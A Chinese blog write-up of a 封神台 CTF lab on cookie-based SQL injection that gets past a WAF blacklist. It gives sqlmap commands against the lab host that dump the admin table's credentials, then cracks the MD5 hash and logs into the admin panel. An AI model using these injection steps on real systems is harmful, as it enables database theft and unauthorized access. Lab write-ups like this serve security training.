【封神台】SQL注入绕过WAF练习(cookie注入)

18 篇文章 0 订阅
9 篇文章 1 订阅

题目

在这里插入图片描述

解题过程

进入网站
在这里插入图片描述
随便点击一个新闻,出现参数id,进行单引号测试:
在这里插入图片描述
提示参数不能包含非法字符,应该是黑名单过滤
猜测是cookie注入
burp抓包,将参数放入cookie中,页面正常访问:
在这里插入图片描述
单引号测试,页面报错,没有警告弹出
在这里插入图片描述
sqlmap跑出payload

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2

在这里插入图片描述
跑出表

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --tables

在这里插入图片描述
跑出admin表的列

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 -T admin --column

在这里插入图片描述
跑出username和password的数据

python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 --dump -T admin -C username,password

在这里插入图片描述
password的值在线解md5后结果为welcome
在这里插入图片描述
用户名为admin,密码为welcome
我们去找一下网站的后台
直接在网站后加/admin ,进入后台
在这里插入图片描述
输入账号密码,进入后台,获取flag
在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值